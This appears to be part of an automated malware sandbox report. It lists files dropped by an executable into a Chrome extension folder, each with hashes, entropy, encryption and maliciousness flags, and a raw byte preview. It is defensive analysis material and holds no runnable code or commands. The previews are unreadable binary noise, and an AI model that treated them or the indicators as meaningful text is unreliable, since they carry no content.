                                                                                                                                                                                                    SHA1:82E88DFEFE98267678FF76401F8ED57381763D28
                                                                                                                                                                                                    SHA-256:8291A7F2CA5EDDBAFB39FF8969DC15E83ECF6C81C2619B320CF1177AEB63B67C
                                                                                                                                                                                                    SHA-512:58B81F4197EC1A81A8082E8F079C14CAF6385BE6588802245F7D4E48AA5F06FAC1D302136D2E2019543FD905147CA11630D0091EFA43687EF5B7BAC2F0C74067
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: P._k4.......U.u.../...w1.V.@..M..../.vR..B....7d....... ...e9...(@.n..{.<j.....|......k......L.Dh.0.L...eu..h......a..c..*..z.......:..C}.u..u.:..M..............<.>Y.s<.]xdy.8.8*9{.."c.....?.)...;....[G^.......{.i...m..xh.;3aBo..P+....d3....:...t..w...A.......Qk..:...2t.C.....7R.{..Pd.....wo.m-..v..J....m....P...J........T..#.........cQ#.Mg]....A.!.j.:...R.?].k.AQO... .w..d.J....I@5$..{D..9.-...$..jS.zv.%W.54..5../.t'C..p?..r. ../....*!.^\...#W.`.=E.a@+l!y`WJ........_..3.=.2.dG.1.D.......R<.f...b%.0....`$.5.(...N..B..P...T......ph...}.."....|>.*.....~j..,..:u&......$..m.R.......4...4...F...7R'.j.p....h8..^Nh........)<..........8....dC4.......o...z@-0F.Y...[..|.(..9.(.2N.Q..T....;..Y...!".;tK..k.".....F...y...ff...BUW>x.%.J..a~.........\U.........2uh.8n..@.>.$k.....;.6?e..4.'........}.b...O......g.%.-....%4..1X.. ....G.......=..o....R... .2.f..}.0.e.`l.(.y..w...U.s..+.[...A{`..:........-.. ..M....n.FR4...7.x...-b...H.....[..#q.^.u.&.~*...(...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\angular.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998778245322054
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:R9hHgdJEBfXqMFvb+Jb8zeIW05lRf74fAxnqQLrBvUv/:R9hc2BfOkFvrV74fAxqQds
                                                                                                                                                                                                    MD5:A53C85CC466C20547AC3D4CAE76FD661
                                                                                                                                                                                                    SHA1:F9A41D9AE0A91C34263AE13FDBF1AC5ED781A960
                                                                                                                                                                                                    SHA-256:1645242BC3AB10239288A468CDE8F375C340EC19B09509ADE11B05C3EED1B76B
                                                                                                                                                                                                    SHA-512:D8326A17FDC76466DB383F52012134BF2F53191B28BCC9284A4479440002CF67B9D9B1B79C01F215F3093FC4E840AD36E632A3BB7335755D8E88C4357C524859
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...g.....2NX....0<1.0.%.,.O..e.>.....E...).yo.....,$..v......g..`+q!...z...o...F._.k.>....8f.....[...;:...$..;Jx..<.j.O...rI.%pIKE.!7.......i:._..Wpv..1....I.!...E.z...2S..7.v...^sP.$.[.8.m...m<`.>.....I..}ju.C....6..+&..@D}.&..4...M.*..=c..kq5..QB..}...j...J.O.@b.L.e..O.r..<-......U........?....0.~K.X.....r2f."..X/2.....E.^......S....j..\.jW.N_6.....GK.....{.[.....Yh..Dz..(..ik.|.&9Q`.]b.W.-.A......A...#.Y,v<.^..L..........uyn....A.k...... i...d.4P.o.....?....L^A.N"..Y... ;.7Np.j...E..e......l..@..M.&..h...T..|.........K9S.9.S......I._.!...(.l.RwXfF.`.............A4J.dh. .#.%o.E..Q.Z...g.-.......q.C.??n$Or..F..h...!G.A..X.:).W....N....M..S..Bq../...uO....w../V.>.a?AH..Td......@....&Je.4.B@.Q....x......K,..@...E...[..<7A...LI.v..w.>kV.Q.....u....R.c....1.'....P......f9.\..9 .9..c....h........O...bx.kW.Q...4..f@.."....~&5.x.*......j....3......D.cYti..n......[.Y..I!{...{XJ..K~z#E...iS....h..bX.R3.J7....S....j`"_F.u4t.-...x:...........z....#%...V..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\background_script.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2417
                                                                                                                                                                                                    Entropy (8bit):7.90700855016813
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:BZ15t+SUCcWLRqHyTFbwi3gC6XcjZvYCjEiRBEn3D:BZ15gSoW9qHwbIcFYCo0BO
                                                                                                                                                                                                    MD5:AC9DEADD2641506BB6FE202F798A9D28
                                                                                                                                                                                                    SHA1:83CCFF5471EC354AA7AE183972B60B48750618B3
                                                                                                                                                                                                    SHA-256:703927783744E056B6A75F14AAC68DD7ACAB598E286B1E6009880A7C5F331E71
                                                                                                                                                                                                    SHA-512:721828F81F887AA8675576AE9B698B8F670521D9551FD2D7FFA585B108987992287F80CF24DC76FF9F9D22EF7A7C3B0ACF96D5A9920B34FC01DF3E57BF5356F9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .mn"..t....LP...f...nB||.....a+...d7]..\^P.,..vJ....X....Zf.'x`....a`.0UL...3b......:y..K,..R.?..lA.j....~l.......7.P....t.|.....#oL..M.!..c%. l.~.a'.2.....FhF.RI`?b.hx.....*R.!..`^)...(.....nn.<..@0..md.p@a.@...j.H. ..&t@uf.r....U.,. ./:(E.........a..3^}~........i...!........V.....-t^Oq.P... q..&..8....q,~.F.n......!...x.N$.'...MD2U8..Pj.@.+MPE?#`1so..K....TC..D...x....j\........=.<.S.\.{!V.3.i..\.Me_.t...z-...7...... ..... ..G..`._.kJ....Uz/.E.u....oH...@O.&Y....N..^.(*..JUx....iL..l^.(......GP({.1........!....m..:.....2!..~%IBE...d.k.B'.R.L...._.`.h......QCQ.*...q!(!..RD....LXW@E|,.....T'.$tS.!......T.s.c-....p...{...+...R.~.DZ.....U..v.qu..3".B"...).1&d....*.4..........R.eJ.. ..;...E.'..D....[G>?.B.. R.......Ap..=..........%HM.f..L..6).8.....-'......&.>..&.f.4.R .e.N....p.J..'x"...=.sP.Y...G...f. .1.v.D>.S...B1F..q...3.A&8.;;....ZB.....@..mp......[4..&E././.Z.k.C.E.sy.y.G.'.D}E..+..=..g zY?^n\x..N].n..+.^LX.rziP-.M
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\cast_sender.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):50526
                                                                                                                                                                                                    Entropy (8bit):7.996384273816075
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:fz+S7Sl5/yj6pEJs3wVTufR5XhEmgWeO/BEFaQS2W7mdjFo+A25guEZiY:fzY6jlJs3XfRrEmNEFaQTeNuEZiY
                                                                                                                                                                                                    MD5:9A9AB618A4BB7769120504F37B845F46
                                                                                                                                                                                                    SHA1:CA89C2D30F935470DA0E6BE9F985816AD76744BD
                                                                                                                                                                                                    SHA-256:CD953EF3C516F15F4ABCF2F58C6FF095932F0A976AC96AB96556094B7D70D7C2
                                                                                                                                                                                                    SHA-512:75BFF40286BEC19E18A8C314EA7558A6D4EBA5DC49FF62DA6B2A8C891A3C2328ADD65DA70246556AE3C29E52B31705DA2E3B6F008872C0CD4CCF4F48DF6298CC
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: et..X=.8].@.7...B............H......X.*.......[..$....G.j.n.Q|...?<.<.'.t...,.P.....IN..tm%..q..C....L.x.1&-.U...C.gn.6B....7'..P|%.../W.J.|...i..%....V.:9...."........eb.....r....s806.w.N.B........n.....7.U.,.B....x.N...?+..*V.E...;...:.......\s...y...\....A.Rtc/........l...}.I....d.L.~......ll.<.....M.EC..P."._b.JfA....~..uc..I.sA..{N..,......v...S....r.=u...jK.:K ....rO..c........4pCm...c.....|R..EXA........q.t3..:.-....&.Q.?....m)C.....?c.........o=.@...UK..e. ..>h.../.D.!.&...F|r.Q.nf.pv!.O.8.'..a.Y.f5.5..G./......^..g0.. ..l....m..).....i..6....+..U........iN...G.E...X....k.......j.-HvZ..,.._lL...8.OQ .A60v~.u-.(O...L....D..+..k.Q.@.G;|4.|y....|[....?..+.E...._r.E.%Hg..J.[Oc...].^.K3.....b..T{.r......E..\..'..M..........';..6....P.,M.i..Q.........V~k.?.:.....LI.xJ;P..u......Op....I....8.P.P.m.P?I,...'.R......^....3....l.s....q*..VoF....s.n.............WFD.#.$.._D.{.&.&`q=.l...R.).c5pI.!#...<....L.STt...e.;@..a..N....4..\.....[.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\common.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):38428
                                                                                                                                                                                                    Entropy (8bit):7.99557827676839
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:OPGr4fOL2qqSpMlCxDR3v4ybdZ0vcBmRCI4pK1+zZlm6Akrp:ZvUSelCxD5v9ZMgmRCe6o6Akrp
                                                                                                                                                                                                    MD5:FE25D90B306B2C065354E7BEDB952310
                                                                                                                                                                                                    SHA1:BE9865BB6095244A5175A2175C333E5554B5E88D
                                                                                                                                                                                                    SHA-256:83264C93E08D44B24AB9E29AC7E16E9DF772DAF18D09988B38BF536DDEC2F65B
                                                                                                                                                                                                    SHA-512:67A38E03E8FA7CEB04F96107EA3B281B60A762DB75137052430CDEF243E21B9F01FD5DF54E4BD4CD394026EDBD645E2CC3EFEA6A72741EFA96D6E4707470F327
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..-..%........7.s..).M...\...u.':;...,NBt..BK.~p....@..,..K.].C.+.1..{.b....M#<S.......v..YQ....s....c...W.g$2..1ol/.-..q......:kkW...T...?......g..Fa.]...6..."A.+.+z.......u.^T.$O.P9')..=^..;E.M..\s...>.x..^.U..Z....^....Z.H.f...qLB.5....p..)..i.0....Z......we._..o#.[...:.....(m._....e.D..0}....bZ.......@\.:..f...,P...q......^o.D[.N.).%O..-..Ms..._.w.W.Bs...Fz.........n:)..[o.e.S.+gW.R.7..+H..r.iuVpa.9.l.j@...B:..m..Y8l......"*$*.c1.65).V.....RX`,i...wL...L?l....L..dy........j\..P...k.h\.~.;...m.......C.......3.}1.._A......W4..oS... C<1......RT..x;._.4....~.B...*...z..g.....#.S....>.iRY.{.yF.b.q.1..F....,.$=.f..l.~..]..n.._.s...z...q.!........bU.L....jj.gA.W.S....f..........L..q[..b4v...G.~G..HQ7..4./.=0{.......L...t.1l..]._....P.>...ML......}x........EI..P...n..G.....;..b...Q.%.[j.>.z...U.5.4G....P.XI?=....'...p[-M<-,ck.N4'_M...yb....;.,xz>&2......G...'-...4.+.....FT...B...-Q..>lP..F.p8...K..l...._.....;....Q.|.U.9H.[...<.>..L..emp@i
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\feedback.css
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3445
                                                                                                                                                                                                    Entropy (8bit):7.951416896474337
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:z1VS1qSdxAn1Rkdavwv6CjaA4iq1Hsu7GZDyRdr:5A1quIRkdavKOiq1Hsu7GED
                                                                                                                                                                                                    MD5:95AF0D2C4E36DDF1DF0449D080BC5730
                                                                                                                                                                                                    SHA1:A99E332268AAF919A673907E683C553C58702509
                                                                                                                                                                                                    SHA-256:0F9CDC35168C9586E07EE6CB39E60FC03039AB546D27DEA2BBEC33CD7189F03D
                                                                                                                                                                                                    SHA-512:837D0579C5AA49E22B8C9AE29875BB87FC8C4C4E2D8DCBB1200D924B4E2D296607544F5A70941D8095A324B0DC3F10115A38DBDBD9C776EE3BC6CF2442EB7194
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......-.~".W.n(Y|......Qd...V.s..c0.8.UR.!.v..:....'..H,. L.!A..wx.t..h..4..~B.rh_w...{j....s.M. .Z...N1.f....s.;.Kc@...a3.C.@m]..=....9.&B. ...:.u.:=BVy|X'...\.....y..fi.)....D)..R!4X..c.G.d9.Tu..G`....v...(..~?0.B..Fsj.,.*J.S.I.$.X.U.....8~..J.r./S[t?............cGGc...1..?9.L~R{.M,.*.....T...,5...t.'..v.:..k'........[..f}t...o.;..{.=V.....(./.+.y.&<.\1.W....b.3..k.....w...)J....)...4....R..L4 yn..l..9+...}.'......g,,2w.b...;oTg....R.|.NF....h..._>lO<.VP}.....>Cw.lm.......PSH....h...`...IC...U..4.b...N*..o..iV.....3Z........s...o..c.c.2.h5...!J)A.$5.c.....E........m........v&.U.pD..t=<F.Y..%R..n.8..0..=....&.......X.S.;...7..._.*..6'.)u.M...\.w(.........(R;..4.P.....P...!t..U.oa.,".{/B.v..[7...g.H.....R...O.N.p...>..}.....h".a4..........1.....2...`TI>....L..#GTk.9b..bX...v...~{.ZL...aq.R.6+...t|...=..(...J..-._.!.....Z{..\{M'S..w\.YG..MIDt...[..8.:.......\..r..Q=FC.(.e//.!..i.4.-.....l..0.p.u....[..54.../..>[FWS>..ff,d^...kU
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\feedback.html
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:DOS executable (COM)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15935
                                                                                                                                                                                                    Entropy (8bit):7.987453888058608
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:YxkVAxjS58WikfXBr6gGmwb5oDYwI2m9djS+KJegH:YxkVqjS58WikZ6gGmgJj/KfH
                                                                                                                                                                                                    MD5:AD99D35D9E478CFDFDB2156C337D5819
                                                                                                                                                                                                    SHA1:BB38F1D4A6E8D91FC29679D50D55A09063B47B17
                                                                                                                                                                                                    SHA-256:489C4FD948CA732CF3ABE815488E8A5C4460F42112D49726DC447195FB517F82
                                                                                                                                                                                                    SHA-512:01A8A8B72DC2E812149C17E645414F3CCBF6BE940B369B1BD72BFBF448F0AA9D5C5729F1F7E21B29FF10E02F960392D617660B0A24A8C2254E9CC65D8ADE31BE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .%-M........m.-(.'GJ...$..6.C%|.]5u............+Q....&x#i/...... ..>..A..6....H.Qc..m..z.v..bY.~.(....g.v.AM;PC"..q.......^5]M)....2...!*lp..?.K..H1...-c...r1t.mp..:pY.......vV......O....=.....z..+L{..<.W.Uv....7w..H...|u..........U.'..N.6......b....JA5.N.t]O......G...3..\...A..c.[...)%.....Au.J."_...J... ......&h...W..u$.4.R.. ..;R...(..>..a....&...j.1.7$.r...r.0P........u...s.-..LG.wNs....."....=....tb...).w.8.h...f.........Rx....G.....p.7........h.r..p..d.-P.......&&.>[.E..x....>.`..A.,.H.FE.t.# .".w..C..=.z....*......H.....l....v.)1..k9....R..k....^H?.(.8..c|..f.y.B.;v!.c3.h.T....f.8.'....4...;}.ri.w.*.p._.v..%...e.>..^...w.&!r..c..g.B?.0WWgdm...J....l.$`.6Q.\'.F-Z7.H..Q*.+...../..=.]..[}..6..eu.~.....'].n............y.+~r.r..~.(f#..W.uVo.....a-6<.F.i..c....^....2...fl0eh..y;.,..T.sj@.Lt6}....T...$j.'8.......)...2..g.?......O...Z..4M.a.`.'.%...[_....L..1..A...W......d.Y....J..w.].A.PbzQ.\..6u.Y.6@O.E..Q.....mT....lB*.\~..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\feedback_script.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):24781
                                                                                                                                                                                                    Entropy (8bit):7.992657257756719
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:OZb4r8lNoM5e6HYqsFwy8kHpnkBA355RqvRQc:IFNv5e6HFbyVHJ6W550RQc
                                                                                                                                                                                                    MD5:B5C14A862A732AFE097A6BE4BA98205F
                                                                                                                                                                                                    SHA1:09F84E9770F742DE01491B7583DA26B6E99F5F0C
                                                                                                                                                                                                    SHA-256:9A70876162ECBE72DD8F1BDEA0DCA90D684FD1CCDA45E5439516FDAE826CC9DB
                                                                                                                                                                                                    SHA-512:13F4FF195AE3E90B23926DE2D9715AC4B64AB0B6F7D192E975BD8A423AD79127DAE6FADC2495916C06BF4BA6B9856DECA206EA3B47EFF6783CFD6CD1CCB4BE5F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: A..._...vSzbG..!0.....=../.N...o.N.7.%.- .>".-a...D...l>NK.j.;s.......!.&..D.=.?.X.ps.. V..A.mE2Dr[p..Ty.....q.J...\....,..3{..T..F.......y..m.G.]~.3..H.p.{9..F.E....f...}..!.#NE:.8.2......A.x......*G..*..v9........+....+....2..s..O...,.W..7...CA..wi.......Z....t.5P@.......?..k`.Q..w.E..t<.^1.+...$....~.-.....Yw.u..K......0....`.....$.a..#@2fq..[..B.B..2.m.l......1.i`Qj.........-...A!.s.i.r3.~..:.2_O@.....\}.L.53#.......>.c.....p.*...b.E*..u..u.w#{&..d..jU....E....#.|.g.x........x.F...d.F.......nA.%8.>.d..^..~..|(.G....LB.../7.y'E=.8.0X...B..n..M...<..h.m.......J...d..7hVD....'A)...yw...LL...W.=......|.H#.<...B.M.z...#&v....A&.....>.._z~#....Q..Zg..f...:.>...@..4p.a.OI.]E.t.%$.(..gNSI.X....=..5.....qA..y<v.....|....";..e......n...0..C#.n.C.nz*.`.;\.S...w.H...........\........s......6 [.1.....0.h.a..C...u.tMN.+(......a..WB...(...^Z.f_.9Q.P.bU.. ^.o...#..(.a...c.n.6.'.Z..;.R....r-..)..T........p... .'.eF...?Q.....UF.....q..#`.ka.Z.L..,A....?.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2613
                                                                                                                                                                                                    Entropy (8bit):7.916503376529612
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:TueqOYnwm4UsZuNxe5NIFR3CBuJ4u2wTk9paFvoDMIalmkhVwbh+D:TLqpnrrsWxe5SxCB4wwTkroIRkwbhG
                                                                                                                                                                                                    MD5:AD12EF3D551E9A3B82369BDD8AA9C938
                                                                                                                                                                                                    SHA1:1DFE2E3CAAEEF187BCA35082110E999DFDC6E7C2
                                                                                                                                                                                                    SHA-256:E47FC28F41C6ABAE10C384546F892463CEF91103ACA8F83DB3FACF866136E8E9
                                                                                                                                                                                                    SHA-512:613D4D95C36B9324475B6E3CF09BDE87BF1B00E27F2D12BCA57E717FEF9ED434D02133727F7F4CCC93BADA7F34A7983A63B3DB2A3D31C383E995F1A7C27BC65D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .D...H..(.Kk.L..)..`.X....aE-.-'G.,..Z...m7.gZp..f.G..L.P.rT.;kQq./,.WY...K..@.Aa.8..{.i..8.....x...QZ.+.4....Lf.....d.2[...e.&.$ruI.:..X.C...Tz..:......U.i.....;l....4K..B.Q....._K.....N.P.Qj..{....w%..E..MP.h@......e.. .R..=e%../...l.$.....,.p.5B..4..x..R.F........R8...ph.{..%....ew.......Iz..}@..3H.!..jb:Q.j...e1*+D.S..6.mj^.."..];....3...4.n.)G.....0..w.@Hf2.`..o....9S..y.._z....~v%..j.~.z+..C([.].O?.].BEh7...(S...5.X0.8..._k.|..E.1,QJ.a......YI.....n......dj..M....9.\S..K.|...}|.....&..p....=...1.<T...[~.DS o...l...\..Pf.1....d...2.6.r..OH....Y...'.C..Vq1t2#.....w.h.B....C.X3.QJ...7....z.#..3.5.V..),./..g.^.Y"e$..9...U..Pf.....K.'i..R.+.QE._.1.d.{...Er.h5Ji2....gR..)....?R..LeP.!U...@..HZ.YggS.*&.d..S_.`.a..%.[n..h]8.G........VJ'.BEYIf._..!..9.....#...Y..D}.A...X.d..._.^..B&.G..u{...E.\.3.s$/?f>f).)...t..i...<o.v..../$.$oc...`..i.yc.6...J...w..=.g.~=.].%#..}./..o3...5.4C.........v..EG..&.f. .k .e......FN.<...q....oo...U4..<..v_I...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\material_css_min.css
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998900263026281
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:cqCR7zqVuqafNtRrI2HTZo6Ga7hwGSorXqNYa8U2QHIrJ:QzqVujVtRrI2H9o7a73SEXqd8QO
                                                                                                                                                                                                    MD5:4BE4765B4C7FB8103FD448B167BBDD86
                                                                                                                                                                                                    SHA1:76B31B1CDA694A507A549E51BDC0BD83CC7BF0FA
                                                                                                                                                                                                    SHA-256:274B81F310366AE3E96170101A4A370B6C91B866F64DFF45ECFF7F325EE86F7A
                                                                                                                                                                                                    SHA-512:F5DFE63B7FC0B8B34E61961AE4B51655A5BE8234F0B6B3FD209EEE06D6522A7AEE1A9D20BDC04CC3CE31AF86FD6D899E81FCFEC2121355967C9D4BBAECD38B99
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: qR$Bs...E#{.....E/.q.\O.w..L.X.c...Y......1...f.....'.>{v=.~{....fMd<.....ePY...R.P....+c&...x..#......qg..0.......K#.Ol..4I.b.....0...u..R3U.?. Z...C....d.6.....T......[.,.+..=.[c...:UMKL..^.3..W.;..T]_..I(X..J'*W.7,..0...:&.....W.|......[.yN.l...1..~...{......;.&..#.E.6.....~.].N.f..|.y<.=...>.Q.b.....\M..........Y..E..D..R,.)......nk.....i.B.0N.N].^......]YnA.v.XO.....}X:..un.,...x)...19v.IM.+..F.sd..Ha..I../J;..2.(...8....`{...5l.n.9....Mo. P...9.........@.lS.$1O....;6.HWT..[.Qx'.ldBf?....&..:...,..n....4k......7.x}...2X.;a< ..f..5...-."..n8!}m.....!..*v2...<4...6|..EL|...Gj.l..8....#....189.('..LR.PA.Zt...>e.W!.,D...7.W...]...-0.i...>..2..'m..V:.:..p...o..d...0x.........i.*.&.:.U....j...n+.Wv..f......u..@.w..3.Th.....A..0.'P.yJX.....a.....47|..=x.?..Q.....2<E..+.d....~........F.....-{.. ..5_..x...J!}....."...B.!.+..EA.'...|7.........4...x.(.)..:..S.+....2N2..L,~u..c.j....(AR(...6D.0|...4l....Z..X..2.v.'.....%i.+...\~.i.[....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_cast_streaming.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):36669
                                                                                                                                                                                                    Entropy (8bit):7.994818812137493
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:FDc208BAy4XUjkqsXMioPnxItR+BG+lgbM+DdV:FcAl4XUbsXexIC7gbM23
                                                                                                                                                                                                    MD5:99C02D8C46898E6EB5B5C9F3FD5EEA21
                                                                                                                                                                                                    SHA1:8BC54C2A272ECFEF334F14077D6B0B3923327C05
                                                                                                                                                                                                    SHA-256:5B605EAFC54B648887FCD6F4EBBFE2180C856336A74EDC5C7E2EB6D0B430A764
                                                                                                                                                                                                    SHA-512:CD2047D2709A2B11287092A4E8380CBB498C6F46850E2A00CFC7549EA71DF26F1CE300929FE596F009E67F9ADAE53EF7EE65333913CE84D917C9D337DFB0BD60
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .S>y.I....+J/..eq'q/[...NI...L.S.qP$.W...[...|h.8....7.*.C .-)!0.@.+9.,+...2W........[.X.....HS%(.;`..A....Y.ll..,>6[..a,n<...F.'C...=..I...h.."M..O.,..C..=8@.V...=y.{\..]. 3...8..FQ.H....=..{.|.l....|....k.e..k.3...$.s..F ..O[.G6......t..Qa$..?.X"..'....<T.6=..b2..z..B...5fu#...!*.a..oa- .c.q...p..+.l..[bn.mvx..=PA..r..2..T.k.U.6..N..}d........B.5AFs/....(.eP....|....(.H...........'....z.b.yF@.....7f.|9!D...>.9P....%8!..N..W..@.i.%K|....JC.R..o....R.......zy.so....X.s.'p.+N.N ..Y0..0...4...{*...J..^.....>.(.D...D...n.v,..J...CsD...;...D..eq..(...bq)+...u.=5...9.YS..Z,.04....R=f......\-qcRN:BD..D....Y;.j......G.. 5.Y+.0>.....r....6)X0{....T+.|%..<D.......~..wC...P.D.Z.W.U....K}.M.d.....f...O.A.....%...GWH......N..<...VV...0ny$.;.(nG.M...:.U%...7.2...O.P......!= .O].f>".pHQ.....rs. .].l..N....Q...g^..3>._*U...G.:(.F.J.G1k..f7...5..$....A.a.N.Z.....l..W0.B.KN...R..?".{.nP....|8..i.Jp.M`..1.......U.O.....\....ua........j<....p.V...$a.9."NH.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\mirroring_common.js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998806602740744
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:Y1u3bRw4+SBX7nyZggmeuz2bOic28JsUtXO27XtdE4:Y1u3bASBzyGbDKOiVi7Xtdf
                                                                                                                                                                                                    MD5:875F84E7D0305966F7F029EF447DDECA
                                                                                                                                                                                                    SHA1:5340E4281C58A04AA9A101E31E5FDF2B10F6CD25
                                                                                                                                                                                                    SHA-256:A98B0B6E25BB95D105211F1078E965CF79B91172FCAB8AF500507C0D40355FAF
                                                                                                                                                                                                    SHA-512:B2FFCA4038D46F6A61BB258E577045656A90866060F8089B6F002DE2BAC922C05933A59C5FDA672E31C392D3D5A9F9DB031865C63062EC593CAF6A848831D675
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
